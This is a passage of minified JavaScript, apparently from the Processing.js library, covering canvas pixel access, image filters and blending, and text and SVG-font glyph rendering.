eg=d8;eg<ef;++eg){d9[en++]=el[ek++];d9[en++]=el[ek++];d9[en++]=el[ek++];d9[en++]=el[ek++]}}em.__isDirty=true;return em}cV.get=function(d7,eb,d8,ea,d9){if(d9!==undefined){return c4(d7,eb,d8,ea,d9)}if(ea!==undefined){return c5(d7,eb,d8,ea)}if(d8!==undefined){return c7(d7,eb,d8)}if(eb!==undefined){return c8(d7,eb)}if(d7!==undefined){return c4(0,0,d7.width,d7.height,d7)}return c5(0,0,cV.width,cV.height)};cV.createGraphics=function(d7,d9,d8){var ea=new D;ea.size(d7,d9,d8);return ea};function R(){if(dR){d4=ai;dR=false;cV.updatePixels()}}function cp(){function d8(ec,ea){function eb(){R();d4[ea].apply(d4,arguments)}ec[ea]=eb}function d7(ed,eb){function ea(){R();return d4[eb]}function ec(ee){R();d4[eb]=ee}cV.defineProperty(ed,eb,{get:ea,set:ec})}for(var d9 in d4){if(typeof d4[d9]==="function"){d8(this,d9)}else{d7(this,d9)}}}function cB(){if(dR){return}cV.loadPixels();if(cm===null){ai=d4;cm=new cp}dR=true;d4=cm;dZ=0}function bu(d7,d9,d8){if(d7<cV.width&&d7>=0&&d9>=0&&d9<cV.height){cB();cV.pixels.setPixel((0|d7)+cV.width*(0|d9),d8);if(++dZ>bY){R()}}}function bs(d7,ed,ea,d8){if(d8.isRemote){throw"Image is loaded remotely. Cannot set x,y."}var ec=cV.color.toArray(ea);var eb=ed*d8.width*4+d7*4;var d9=d8.imageData.data;d9[eb]=ec[0];d9[eb+1]=ec[1];d9[eb+2]=ec[2];d9[eb+3]=ec[3]}cV.set=function(d7,ec,ea,d9){var d8,eb;if(arguments.length===3){if(typeof ea==="number"){bu(d7,ec,ea)}else{if(ea instanceof cF||ea.__isPImage){cV.image(ea,d7,ec)}}}else{if(arguments.length===4){bs(d7,ec,ea,d9)}}};cV.imageData={};cV.pixels={getLength:function(){return cV.imageData.data.length?cV.imageData.data.length/4:0},getPixel:function(d7){var d9=d7*4,d8=cV.imageData.data;return d8[d9+3]<<24&4278190080|d8[d9+0]<<16&16711680|d8[d9+1]<<8&65280|d8[d9+2]&255},setPixel:function(d7,ea){var d9=d7*4,d8=cV.imageData.data;d8[d9+0]=(ea&16711680)>>>16;d8[d9+1]=(ea&65280)>>>8;d8[d9+2]=ea&255;d8[d9+3]=(ea&4278190080)>>>24},toArray:function(){var d7=[],d9=cV.imageData.width*cV.imageData.height,ea=cV.imageData.data;for(var d8=0,eb=0;d8<d9;d8++,eb+=4){d7.push(ea[eb+3]<<24&4278190080|ea[eb+0]<<16&16711680|ea[eb+1]<<8&65280|ea[eb+2]&255)}return d7},set:function(d7){for(var d8=0,d9=d7.length;d8<d9;d8++){this.setPixel(d8,d7[d8])}}};cV.loadPixels=function(){cV.imageData=dU.$ensureContext().getImageData(0,0,cV.width,cV.height)};cV.updatePixels=function(){if(cV.imageData){dU.$ensureContext().putImageData(cV.imageData,0,0)}};cV.hint=function(d8){var d7=dU.$ensureContext();if(d8===4){d7.disable(d7.DEPTH_TEST);d7.depthMask(false);d7.clear(d7.DEPTH_BUFFER_BIT)}else{if(d8===-4){d7.enable(d7.DEPTH_TEST);d7.depthMask(true)}}};var bB=function(ea,d9,d8,d7){var eb;if(ea instanceof cF||ea.__isPImage){eb=ea;if(!eb.loaded){throw"Error using image in background(): PImage not loaded."}if(eb.width!==cV.width||eb.height!==cV.height){throw"Background image must be the same dimensions as the canvas."}}else{eb=cV.color(ea,d9,d8,d7)}a0=eb};bO.prototype.background=function(ea,d9,d8,d7){if(ea!==r){bB(ea,d9,d8,d7)}if(a0 instanceof cF||a0.__isPImage){aC();d4.setTransform(1,0,0,1,0,0);cV.image(a0,0,0);cO()}else{aC();d4.setTransform(1,0,0,1,0,0);if(cV.alpha(a0)!==bR){d4.clearRect(0,0,cV.width,cV.height)}d4.fillStyle=cV.color.toString(a0);d4.fillRect(0,0,cV.width,cV.height);ap=true;cO()}};by.prototype.background=function(ea,d9,d8,d7){if(arguments.length>0){bB(ea,d9,d8,d7)}var eb=cV.color.toGLArray(a0);d4.clearColor(eb[0],eb[1],eb[2],eb[3]);d4.clear(d4.COLOR_BUFFER_BIT|d4.DEPTH_BUFFER_BIT)};bO.prototype.image=function(ea,ef,ed,eg,eb){ef=o.round(ef);ed=o.round(ed);if(ea.width>0){var eh=eg||ea.width;var ee=eb||ea.height;var d7=bh(ef||0,ed||0,eg||ea.width,eb||ea.height,arguments.length<4);var ec=!!ea.sourceImg&&bb===null;if(ec){var d8=ea.sourceImg;if(ea.__isDirty){ea.updatePixels()}d4.drawImage(d8,0,0,d8.width,d8.height,d7.x,d7.y,d7.w,d7.h)}else{var d9=ea.toImageData();if(bb!==null){bb(d9);ea.__isDirty=true}d4.drawImage(bv(d9).canvas,0,0,ea.width,ea.height,d7.x,d7.y,d7.w,d7.h)}}};by.prototype.image=function(d9,d7,eb,d8,ea){if(d9.width>0){d7=o.round(d7);eb=o.round(eb);d8=d8||d9.width;ea=ea||d9.height;cV.beginShape(cV.QUADS);cV.texture(d9);cV.vertex(d7,eb,0,0,0);cV.vertex(d7,eb+ea,0,0,ea);cV.vertex(d7+d8,eb+ea,0,d8,ea);cV.vertex(d7+d8,eb,0,d8,0);cV.endShape()}};cV.tint=function(ea,d9,d7,ef){var ec=cV.color(ea,d9,d7,ef);var d8=cV.red(ec)/bG;var eb=cV.green(ec)/bF;var ed=cV.blue(ec)/bD;var ee=cV.alpha(ec)/bR;bb=function(ej){var ei=ej.data,eh=4*ej.width*ej.height;for(var eg=0;eg<eh;){ei[eg++]*=d8;ei[eg++]*=eb;ei[eg++]*=ed;ei[eg++]*=ee}};bt=function(eh){for(var eg=0;eg<eh.length;){eh[eg++]=d8;eh[eg++]=eb;eh[eg++]=ed;eh[eg++]=ee}}};cV.noTint=function(){bb=null;bt=null};cV.copy=function(d7,ec,eb,ed,d9,ef,ee,d8,ea){if(ea===r){ea=d8;d8=ee;ee=ef;ef=d9;d9=ed;ed=eb;eb=ec;ec=d7;d7=cV}cV.blend(d7,ec,eb,ed,d9,ef,ee,d8,ea,0)};cV.blend=function(d7,eh,eg,ek,ec,em,el,d8,ee,ed,ea){if(d7.isRemote){throw"Image is loaded remotely. Cannot blend image."}if(ed===r){ed=ee;ee=d8;d8=el;el=em;em=ec;ec=ek;ek=eg;eg=eh;eh=d7;d7=cV}var d9=eh+ek,ef=eg+ec,ej=em+d8,eb=el+ee,ei=ea||cV;if(ea===r||ed===r){cV.loadPixels()}d7.loadPixels();if(d7===cV&&cV.intersect(eh,eg,d9,ef,em,el,ej,eb)){cV.blit_resize(cV.get(eh,eg,d9-eh,ef-eg),0,0,d9-eh-1,ef-eg-1,ei.imageData.data,ei.width,ei.height,em,el,ej,eb,ed)}else{cV.blit_resize(d7,eh,eg,d9,ef,ei.imageData.data,ei.width,ei.height,em,el,ej,eb,ed)}if(ea===r){cV.updatePixels()}};var bm=function(eb){var d7=cV.floor(eb*3.5),d9,d8;d7=d7<1?1:d7<248?d7:248;if(cV.shared.blurRadius!==d7){cV.shared.blurRadius=d7;cV.shared.blurKernelSize=1+(cV.shared.blurRadius<<1);cV.shared.blurKernel=new e(cV.shared.blurKernelSize);var ed=cV.shared.blurKernel;var ec=cV.shared.blurKernelSize;var ea=cV.shared.blurRadius;for(d9=0;d9<ec;d9++){ed[d9]=0}var ee=(d7-1)*(d7-1);for(d9=1;d9<d7;d9++){ed[d7+d9]=ed[d8]=ee}ed[d7]=d7*d7}};var b6=function(el,eq){var d9,ec,ei,en,eo,ex,ep;var es,ek,ew,ev,em;var ef=eq.pixels.getLength();var er=new e(ef);var eA=new e(ef);var ee=new e(ef);var ez=new e(ef);var ey=0;var eh,eg,eu,eb;bm(el);var d8=eq.height;var d7=eq.width;var et=cV.shared.blurKernelSize;var ej=cV.shared.blurRadius;var ed=cV.shared.blurKernel;var ea=eq.imageData.data;for(eg=0;eg<d8;eg++){for(eh=0;eh<d7;eh++){en=ei=ec=eo=d9=0;es=eh-ej;if(es<0){em=-es;es=0}else{if(es>=d7){break}em=0}for(eu=em;eu<et;eu++){if(es>=d7){break}eb=(es+ey)*4;ep=ed[eu];eo+=ep*ea[eb+3];ec+=ep*ea[eb];ei+=ep*ea[eb+1];en+=ep*ea[eb+2];d9+=ep;es++}ek=ey+eh;ez[ek]=eo/d9;er[ek]=ec/d9;eA[ek]=ei/d9;ee[ek]=en/d9}ey+=d7}ey=0;ew=-ej;ev=ew*d7;for(eg=0;eg<d8;eg++){for(eh=0;eh<d7;eh++){en=ei=ec=eo=d9=0;if(ew<0){em=ek=-ew;es=eh}else{if(ew>=d8){break}em=0;ek=ew;es=eh+ev}for(eu=em;eu<et;eu++){if(ek>=d8){break}ep=ed[eu];eo+=ep*ez[es];ec+=ep*er[es];ei+=ep*eA[es];en+=ep*ee[es];d9+=ep;ek++;es+=d7}eb=(eh+ey)*4;ea[eb]=ec/d9;ea[eb+1]=ei/d9;ea[eb+2]=en/d9;ea[eb+3]=eo/d9}ey+=d7;ev+=d7;ew++}};var ce=function(eo,ei){var ee=0;var es=ei.pixels.getLength();var ej=new I(es);var em,d8,eh,eg,ea;var en,eb,ed,ef,d9,ek,er,d7,ep,ec,eq,el;if(!eo){while(ee<es){em=ee;d8=ee+ei.width;while(ee<d8){eh=eg=ei.pixels.getPixel(ee);eb=ee-1;en=ee+1;ed=ee-ei.width;ef=ee+ei.width;if(eb<em){eb=ee}if(en>=d8){en=ee}if(ed<0){ed=0}if(ef>=es){ef=ee}er=ei.pixels.getPixel(ed);ek=ei.pixels.getPixel(eb);d7=ei.pixels.getPixel(ef);d9=ei.pixels.getPixel(en);ea=77*(eh>>16&255)+151*(eh>>8&255)+28*(eh&255);ec=77*(ek>>16&255)+151*(ek>>8&255)+28*(ek&255);ep=77*(d9>>16&255)+151*(d9>>8&255)+28*(d9&255);eq=77*(er>>16&255)+151*(er>>8&255)+28*(er&255);el=77*(d7>>16&255)+151*(d7>>8&255)+28*(d7&255);if(ec>ea){eg=ek;ea=ec}if(ep>ea){eg=d9;ea=ep}if(eq>ea){eg=er;ea=eq}if(el>ea){eg=d7;ea=el}ej[ee++]=eg}}}else{while(ee<es){em=ee;d8=ee+ei.width;while(ee<d8){eh=eg=ei.pixels.getPixel(ee);eb=ee-1;en=ee+1;ed=ee-ei.width;ef=ee+ei.width;if(eb<em){eb=ee}if(en>=d8){en=ee}if(ed<0){ed=0}if(ef>=es){ef=ee}er=ei.pixels.getPixel(ed);ek=ei.pixels.getPixel(eb);d7=ei.pixels.getPixel(ef);d9=ei.pixels.getPixel(en);ea=77*(eh>>16&255)+151*(eh>>8&255)+28*(eh&255);ec=77*(ek>>16&255)+151*(ek>>8&255)+28*(ek&255);ep=77*(d9>>16&255)+151*(d9>>8&255)+28*(d9&255);eq=77*(er>>16&255)+151*(er>>8&255)+28*(er&255);el=77*(d7>>16&255)+151*(d7>>8&255)+28*(d7&255);if(ec<ea){eg=ek;ea=ec}if(ep<ea){eg=d9;ea=ep}if(eq<ea){eg=er;ea=eq}if(el<ea){eg=d7;ea=el}ej[ee++]=eg}}}ei.pixels.set(ej)};cV.filter=function(ee,ed,ea){var eh,ec,d8,eg;if(arguments.length===3){ea.loadPixels();eh=ea}else{cV.loadPixels();eh=cV}if(ed===r){ed=null}if(eh.isRemote){throw"Image is loaded remotely. Cannot filter image."}var ei=eh.pixels.getLength();switch(ee){case 11:var ej=ed||1;b6(ej,eh);break;case 12:if(eh.format===4){for(eg=0;eg<ei;eg++){ec=255-eh.pixels.getPixel(eg);eh.pixels.setPixel(eg,4278190080|ec<<16|ec<<8|ec)}eh.format=1}else{for(eg=0;eg<ei;eg++){ec=eh.pixels.getPixel(eg);d8=77*(ec>>16&255)+151*(ec>>8&255)+28*(ec&255)>>8;eh.pixels.setPixel(eg,ec&4278190080|d8<<16|d8<<8|d8)}}break;case 13:for(eg=0;eg<ei;eg++){eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)^16777215)}break;case 15:if(ed===null){throw"Use filter(POSTERIZE, int levels) instead of filter(POSTERIZE)"}var em=cV.floor(ed);if(em<2||em>255){throw"Levels must be between 2 and 255 for filter(POSTERIZE, levels)"}var ef=em-1;for(eg=0;eg<ei;eg++){var d7=eh.pixels.getPixel(eg)>>16&255;var ek=eh.pixels.getPixel(eg)>>8&255;var d9=eh.pixels.getPixel(eg)&255;d7=(d7*em>>8)*255/ef;ek=(ek*em>>8)*255/ef;d9=(d9*em>>8)*255/ef;eh.pixels.setPixel(eg,4278190080&eh.pixels.getPixel(eg)|d7<<16|ek<<8|d9)}break;case 14:for(eg=0;eg<ei;eg++){eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)|4278190080)}eh.format=1;break;case 16:if(ed===null){ed=0.5}if(ed<0||ed>1){throw"Level must be between 0 and 1 for filter(THRESHOLD, level)"}var eb=cV.floor(ed*255);for(eg=0;eg<ei;eg++){var el=cV.max((eh.pixels.getPixel(eg)&16711680)>>16,cV.max((eh.pixels.getPixel(eg)&65280)>>8,eh.pixels.getPixel(eg)&255));eh.pixels.setPixel(eg,eh.pixels.getPixel(eg)&4278190080|(el<eb?0:16777215))}break;case 17:ce(true,eh);break;case 18:ce(false,eh);break}eh.updatePixels()};cV.shared={fracU:0,ifU:0,fracV:0,ifV:0,u1:0,u2:0,v1:0,v2:0,sX:0,sY:0,iw:0,iw1:0,ih1:0,ul:0,ll:0,ur:0,lr:0,cUL:0,cLL:0,cUR:0,cLR:0,srcXOffset:0,srcYOffset:0,r:0,g:0,b:0,a:0,srcBuffer:null,blurRadius:0,blurKernelSize:0,blurKernel:null};cV.intersect=function(d9,eg,d8,ef,ek,ed,ej,ec){var ei=d8-d9+1;var eb=ef-eg+1;var d7=ej-ek+1;var ee=ec-ed+1;if(ek<d9){d7+=ek-d9;if(d7>ei){d7=ei}}else{var eh=ei+d9-ek;if(d7>eh){d7=eh}}if(ed<eg){ee+=ed-eg;if(ee>eb){ee=eb}}else{var ea=eb+eg-ed;if(ee>ea){ee=ea}}return !(d7<=0||ee<=0)};var dO={};dO[1]=cV.modes.blend;dO[2]=cV.modes.add;dO[4]=cV.modes.subtract;dO[8]=cV.modes.lightest;dO[16]=cV.modes.darkest;dO[0]=cV.modes.replace;dO[32]=cV.modes.difference;dO[64]=cV.modes.exclusion;dO[128]=cV.modes.multiply;dO[256]=cV.modes.screen;dO[512]=cV.modes.overlay;dO[1024]=cV.modes.hard_light;dO[2048]=cV.modes.soft_light;dO[4096]=cV.modes.dodge;dO[8192]=cV.modes.burn;cV.blit_resize=function(ek,ew,eq,ev,ep,eB,eg,eo,eu,el,et,ej,em){var ez,ey;if(ew<0){ew=0}if(eq<0){eq=0}if(ev>=ek.width){ev=ek.width-1}if(ep>=ek.height){ep=ek.height-1}var eF=ev-ew;var eK=ep-eq;var d7=et-eu;var eh=ej-el;if(d7<=0||eh<=0||eF<=0||eK<=0||eu>=eg||el>=eo||ew>=ek.width||eq>=ek.height){return}var ee=o.floor(eF/d7*32768);var eb=o.floor(eK/eh*32768);var eD=cV.shared;eD.srcXOffset=o.floor(eu<0?-eu*ee:ew*32768);eD.srcYOffset=o.floor(el<0?-el*eb:eq*32768);if(eu<0){d7+=eu;eu=0}if(el<0){eh+=el;el=0}d7=o.min(d7,eg-eu);eh=o.min(eh,eo-el);var er=el*eg+eu;var eN;eD.srcBuffer=ek.imageData.data;eD.iw=ek.width;eD.iw1=ek.width-1;eD.ih1=ek.height-1;var es=cV.filter_bilinear,eH=cV.filter_new_scanline,ef=dO[em],eE,eJ,eC,eG,d9,ea,d8=4278190080,eI=16711680,ex=65280,ed=255,eM=32767,eA=15,ei=1,en=9,ec=eD.srcBuffer,eL=o.min;for(ey=0;ey<eh;ey++){eD.sX=eD.srcXOffset;eD.fracV=eD.srcYOffset&eM;eD.ifV=eM-eD.fracV;eD.v1=(eD.srcYOffset>>eA)*eD.iw;eD.v2=eL((eD.srcYOffset>>eA)+1,eD.ih1)*eD.iw;for(ez=0;ez<d7;ez++){eJ=(er+ez)*4;eN=eB[eJ+3]<<24&d8|eB[eJ]<<16&eI|eB[eJ+1]<<8&ex|eB[eJ+2]&ed;eD.fracU=eD.sX&eM;eD.ifU=eM-eD.fracU;eD.ul=eD.ifU*eD.ifV>>eA;eD.ll=eD.ifU*eD.fracV>>eA;eD.ur=eD.fracU*eD.ifV>>eA;eD.lr=eD.fracU*eD.fracV>>eA;eD.u1=eD.sX>>eA;eD.u2=eL(eD.u1+1,eD.iw1);eC=(eD.v1+eD.u1)*4;eG=(eD.v1+eD.u2)*4;d9=(eD.v2+eD.u1)*4;ea=(eD.v2+eD.u2)*4;eD.cUL=ec[eC+3]<<24&d8|ec[eC]<<16&eI|ec[eC+1]<<8&ex|ec[eC+2]&ed;eD.cUR=ec[eG+3]<<24&d8|ec[eG]<<16&eI|ec[eG+1]<<8&ex|ec[eG+2]&ed;eD.cLL=ec[d9+3]<<24&d8|ec[d9]<<16&eI|ec[d9+1]<<8&ex|ec[d9+2]&ed;eD.cLR=ec[ea+3]<<24&d8|ec[ea]<<16&eI|ec[ea+1]<<8&ex|ec[ea+2]&ed;eD.r=eD.ul*((eD.cUL&eI)>>16)+eD.ll*((eD.cLL&eI)>>16)+eD.ur*((eD.cUR&eI)>>16)+eD.lr*((eD.cLR&eI)>>16)<<ei&eI;eD.g=eD.ul*(eD.cUL&ex)+eD.ll*(eD.cLL&ex)+eD.ur*(eD.cUR&ex)+eD.lr*(eD.cLR&ex)>>>eA&ex;eD.b=eD.ul*(eD.cUL&ed)+eD.ll*(eD.cLL&ed)+eD.ur*(eD.cUR&ed)+eD.lr*(eD.cLR&ed)>>>eA;eD.a=eD.ul*((eD.cUL&d8)>>>24)+eD.ll*((eD.cLL&d8)>>>24)+eD.ur*((eD.cUR&d8)>>>24)+eD.lr*((eD.cLR&d8)>>>24)<<en&d8;eE=ef(eN,eD.a|eD.r|eD.g|eD.b);eB[eJ]=(eE&eI)>>>16;eB[eJ+1]=(eE&ex)>>>8;eB[eJ+2]=eE&ed;eB[eJ+3]=(eE&d8)>>>24;eD.sX+=ee}er+=eg;eD.srcYOffset+=eb}};cV.loadFont=function(d8,d9){if(d8===r){throw"font name required in loadFont."}if(d8.indexOf(".svg")===-1){if(d9===r){d9=U.size}return F.get(d8,d9)}var d7=cV.loadGlyphs(d8);return{name:d8,css:"12px sans-serif",glyph:true,units_per_em:d7.units_per_em,horiz_adv_x:1/d7.units_per_em*d7.horiz_adv_x,ascent:d7.ascent,descent:d7.descent,width:function(ee){var ec=0;var ea=ee.length;for(var eb=0;eb<ea;eb++){try{ec+=parseFloat(cV.glyphLook(cV.glyphTable[d8],ee[eb]).horiz_adv_x)}catch(ed){D.debug(ed)}}return ec/cV.glyphTable[d8].units_per_em}}};cV.createFont=function(d7,d8){return cV.loadFont(d7,d8)};cV.textFont=function(d7,d9){if(d9!==r){if(!d7.glyph){d7=F.get(d7.name,d9)}dW=d9}U=d7;W=U.name;aZ=U.ascent;dx=U.descent;d3=U.leading;var d8=dU.$ensureContext();d8.font=U.css};cV.textSize=function(d8){if(d8!==dW){U=F.get(W,d8);dW=d8;aZ=U.ascent;dx=U.descent;d3=U.leading;var d7=dU.$ensureContext();d7.font=U.css}};cV.textAscent=function(){return aZ};cV.textDescent=function(){return dx};cV.textLeading=function(d7){d3=d7};cV.textAlign=function(d8,d7){L=d8;c0=d7||0};function br(d7){if(d7 instanceof String){return d7}if(typeof d7==="number"){if(d7===(0|d7)){return d7.toString()}return cV.nf(d7,0,3)}if(d7===null||d7===r){return""}return d7.toString()}bO.prototype.textWidth=function(eb){var d7=br(eb).split(/\r?\n/g),d9=0;var d8,ea=d7.length;d4.font=U.css;for(d8=0;d8<ea;++d8){d9=o.max(d9,U.measureTextWidth(d7[d8]))}return d9|0};by.prototype.textWidth=function(ec){var d7=br(ec).split(/\r?\n/g),ea=0;var d9,eb=d7.length;if(cD===r){cD=d.createElement("canvas")}var d8=cD.getContext("2d");d8.font=U.css;for(d9=0;d9<eb;++d9){ea=o.max(ea,d8.measureText(d7[d9]).width)}return ea|0};cV.glyphLook=function(d7,d8){try{switch(d8){case"1":return d7.one;case"2":return d7.two;case"3":return d7.three;case"4":return d7.four;case"5":return d7.five;case"6":return d7.six;case"7":return d7.seven;case"8":return d7.eight;case"9":return d7.nine;case"0":return d7.zero;case" ":return d7.space;case"$":return d7.dollar;case"!":return d7.exclam;case'"':return d7.quotedbl;case"#":return d7.numbersign;case"%":return d7.percent;case"&":return d7.ampersand;case"'":return d7.quotesingle;case"(":return d7.parenleft;case")":return d7.parenright;case"*":return d7.asterisk;case"+":return d7.plus;case",":return d7.comma;case"-":return d7.hyphen;case".":return d7.period;case"/":return d7.slash;case"_":return d7.underscore;case":":return d7.colon;case";":return d7.semicolon;case"<":return d7.less;case"=":return d7.equal;case">":return d7.greater;case"?":return d7.question;case"@":return d7.at;case"[":return d7.bracketleft;case"\\":return d7.backslash;case"]":return d7.bracketright;case"^":return d7.asciicircum;case"`":return d7.grave;case"{":return d7.braceleft;case"|":return d7.bar;case"}":return d7.braceright;case"~":return d7.asciitilde;default:return d7[d8]}}catch(d9){D.debug(d9)}};bO.prototype.text$line=function(ef,ei,eh,eg,ec){var ee=0,ed=0;if(!U.glyph){if(ef&&"fillText" in d4){if(ap){d4.fillStyle=cV.color.toString(aX);ap=false}if(ec===39||ec===3){ee=U.measureTextWidth(ef);if(ec===39){ed=-ee}else{ed=-ee/2}}d4.fillText(ef,ei+ed,eh)}}else{var d7=cV.glyphTable[W];aC();d4.translate(ei,eh+dW);if(ec===39||ec===3){ee=d7.width(ef);if(ec===39){ed=-ee}else{ed=-ee/2}}var ej=d7.units_per_em,eb=1/ej*dW;d4.scale(eb,eb);for(var d8=0,d9=ef.length;d8<d9;d8++){try{cV.glyphLook(d7,ef[d8]).draw()}catch(ea){D.debug(ea)}}cO()}};by.prototype.text$line=function(ee,ei,eh,ef,ec){if(cD===r){cD=d.createElement("canvas")}var d8=d4;d4=cD.getContext("2d");d4.font=U.css;var ed=U.measureTextWidth(ee);cD.width=ed;cD.height=dW;d4=cD.getContext("2d");d4.font=U.css;d4.textBaseline="top";bO.prototype.text$line(ee,0,0,0,37);var d7=cD.width/cD.height;d4=d8;d4.bindTexture(d4.TEXTURE_2D,bP);d4.texImage2D(d4.TEXTURE_2D,0,d4.RGBA,d4.RGBA,d4.UNSIGNED_BYTE,cD);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_MAG_FILTER,d4.LINEAR);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_MIN_FILTER,d4.LINEAR);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_WRAP_T,d4.CLAMP_TO_EDGE);d4.texParameteri(d4.TEXTURE_2D,d4.TEXTURE_WRAP_S,d4.CLAMP_TO_EDGE);var eb=0;if(ec===39){eb=-ed}else{if(ec===3){eb=-ed/2}}var d9=new aM;var ea=dW*0.5;d9.translate(ei+eb-ea/2,eh-ea,ef);d9.scale(-d7*ea,-ea,ea);d9.translate(-1,-1,-1);d9.transpose();var eg=new aM;eg.scale(1,-1,1);eg.apply(dF.array());eg.transpose();d4.useProgram(dM);db("vertex2d",dM,"Vertex",3,cG);db("aTextureCoord2d",dM,"aTextureCoord",2,aa);dV("uSampler2d",dM,"uSampler",[0]);dV("picktype2d",dM,"picktype",1);a5("model2d",dM,"model",false,d9.array());a5("view2d",dM,"view",false,eg.array());dY("color2d",dM,"color",bl);d4.bindBuffer(d4.ELEMENT_ARRAY_BUFFER,P);d4.drawElements(d4.TRIANGLES,6,d4.UNSIGNED_SHORT,0)};function be(ea,ed,ec,eb){var ef,d9;if(ea.indexOf("\n")<0){ef=[ea];d9=1}else{ef=ea.split(/\r?\n/g);d9=ef.length}var d7=0;if(c0===101){d7=aZ+dx}else{if(c0===3){d7=aZ/2-(d9-1)*d3/2}else{if(c0===102){d7=-(dx+(d9-1)*d3)}}}for(var d8=0;d8<d9;++d8){var ee=ef[d8];dU.text$line(ee,ed,ec+d7,eb,L);d7+=d3}}function a9(en,ei,eh,em,ek,eg){if(en.length===0||em===0||ek===0){return}if(dW>ek){return}var ej=-1;var eb=0;var d7=0;var ed=[];for(var ec=0,ep=en.length;ec<ep;ec++){var ee=en[ec];var es=ee===" ";var el=U.measureTextWidth(ee);if(ee!=="\n"&&d7+el<=em){if(es){ej=ec}d7+=el}else{if(ej+1===eb){if(ec>0){ej=ec}else{return}}if(ee==="\n"){ed.push({text:en.substring(eb,ec),width:d7});eb=ec+1}else{ed.push({text:en.substring(eb,ej+1),width:d7});eb=ej+1}d7=0;ec=eb-1}}if(eb<ep){ed.push({text:en.substring(eb),width:d7})}var er=1,ef=aZ;if(L===3){er=em/2}else{if(L===39){er=em}}var eo=ed.length,d8=o.min(eo,o.floor(ek/d3));if(c0===101){ef=aZ+dx}else{if(c0===3){ef=ek/2-d3*(d8/2-1)}else{if(c0===102){ef=dx+d3}}}var d9,ea,eq;for(d9=0;d9<eo;d9++){eq=d9*d3;if(ef+eq>ek-dx){break}ea=ed[d9];dU.text$line(ea.text,ei+er,eh+ef+eq,eg,L)}}cV.text=function(){if(cH===5){return}if(arguments.length===3){be(br(arguments[0]),arguments[1],arguments[2],0)}else{if(arguments.length===4){be(br(arguments[0]),arguments[1],arguments[2],arguments[3])}else{if(arguments.length===5){a9(br(arguments[0]),arguments[1],arguments[2],arguments[3],arguments[4],0)}else{if(arguments.length===6){a9(br(arguments[0]),arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])}}}}};cV.textMode=function(d7){cH=d7};cV.loadGlyphs=function(ed){var ef,ee,eb,d9,em,el,ek,en,eh,eo,ei,ej="[0-9\\-]+",eg;var ec=function(eu,et){var er=0,eq=[],ep,es=new RegExp(eu,"g");ep=eq[er]=es.exec(et);while(ep){er++;ep=eq[er]=es.exec(et)}return eq};var d8=function(eu){var ev=ec("[A-Za-z][0-9\\- ]+|Z",eu);var et=function(){aC();return dU.$ensureContext()};var er=function(){bk();dc();cO()};eg="return {draw:function(){var curContext=beforePathDraw();curContext.beginPath();";ef=0;ee=0;eb=0;d9=0;em=0;el=0;eu=0;en=0;eh="";eo=ev.length-1;for(var eq=0;eq<eo;eq++){var ep=ev[eq][0],es=ec(ej,ep);switch(ep[0]){case"M":ef=parseFloat(es[0][0]);ee=parseFloat(es[1][0]);eg+="curContext.moveTo("+ef+","+-ee+");";break;case"L":ef=parseFloat(es[0][0]);ee=parseFloat(es[1][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"H":ef=parseFloat(es[0][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"V":ee=parseFloat(es[0][0]);eg+="curContext.lineTo("+ef+","+-ee+");";break;case"T":em=parseFloat(es[0][0]);el=parseFloat(es[1][0]);if(eh==="Q"||eh==="T"){eu=o.sqrt(o.pow(ef-eb,2)+o.pow(d9-ee,2));en=o.PI+o.atan2(eb-ef,d9-ee);eb=ef+o.sin(en)*eu;d9=ee+o.cos(en)*eu}else{eb=ef;d9=ee}eg+="curContext.quadraticCurveTo("+eb+","+-d9+","+em+","+-el+");";ef=em;ee=el;break;case"Q":eb=parseFloat(es[0][0]);d9=parseFloat(es[1][0]);em=parseFloat(es[2][0]);el=parseFloat(es[3][0]);eg+="curContext.quadraticCurveTo("+eb+","+-d9+","+em+","+-el+");";ef=em;ee=el;break;case"Z":eg+="curContext.closePath();";break}eh=ep[0]}eg+="afterPathDraw();";eg+="curContext.translate("+ei+",0);";eg+="}}";return(new Function("beforePathDraw","afterPathDraw",eg))(et,er)};var d7=function(es){var er=es.getElementsByTagName("font");cV.glyphTable[ed].horiz_adv_x=er[0].getAttribute("horiz-adv-x");var eu=es.getElementsByTagName("font-face")[0];cV.glyphTable[ed].units_per_em=parseFloat(eu.getAttribute("units-per-em"));cV.glyphTable[ed].ascent=parseFloat(eu.getAttribute("ascent"));cV.glyphTable[ed].descent=parseFloat(eu.getAttribute("descent"));var ew=es.getElementsByTagName("glyph"),eq=ew.length;for(var ev=0;ev<eq;ev++){var ep=ew[ev].getAttribute("unicode");var et=ew[ev].getAttribute("glyph-name");ei=ew[ev].getAttribute("horiz-adv-x");if(ei===null){ei=cV.glyphTable[ed].horiz_adv_x}ek=ew[ev].getAttribute("d");if(ek!==r){eg=d8(ek);cV.glyphTable[ed][et]={name:et,unicode:ep,horiz_adv_x:ei,draw:eg.draw}}}};var ea=function(){var er;try{er=d.implementation.createDocument("","",null)}catch(et){D.debug(et.message);return}try{er.async=false;er.load(ed);d7(er.getElementsByTagName("svg")[0])}catch(eq){D.debug(eq);try{var ep=new B.XMLHttpRequest;ep.open("GET",ed,false);ep.send(null);d7(ep.responseXML.documentElement)}catch(es){D.debug(eq)}}};cV.glyphTable[ed]={};ea(ed);return cV.glyphTable[ed]};cV.param=function(d9){var d8="data-processing-"+d9;if(ac.hasAttribute(d8)){return ac.getAttribute(d8)}for(var ea=0,d7=ac.childNodes.length;ea<d7;++ea){var eb=ac.childNodes.item(ea);if(eb.nodeType!==1||eb.tagName.toLowerCase()!=="param"){continue}if(eb.getAttribute("name")===d9){return eb.getAttribute("value")}}if(cP.params.hasOwnProperty(d9)){return cP.params[d9]}return null};function cK(d8){if(d8==="3D"){dU=new by}else{if(d8==="2D"){dU=new bO}else{dU=new b9}}for(var d7 in b9.prototype){if(b9.prototype.hasOwnProperty(d7)&&d7.indexOf("$")<0){cV[d7]=dU[d7]}}dU.$init()}function cT(d7){return function(){cK("2D");return 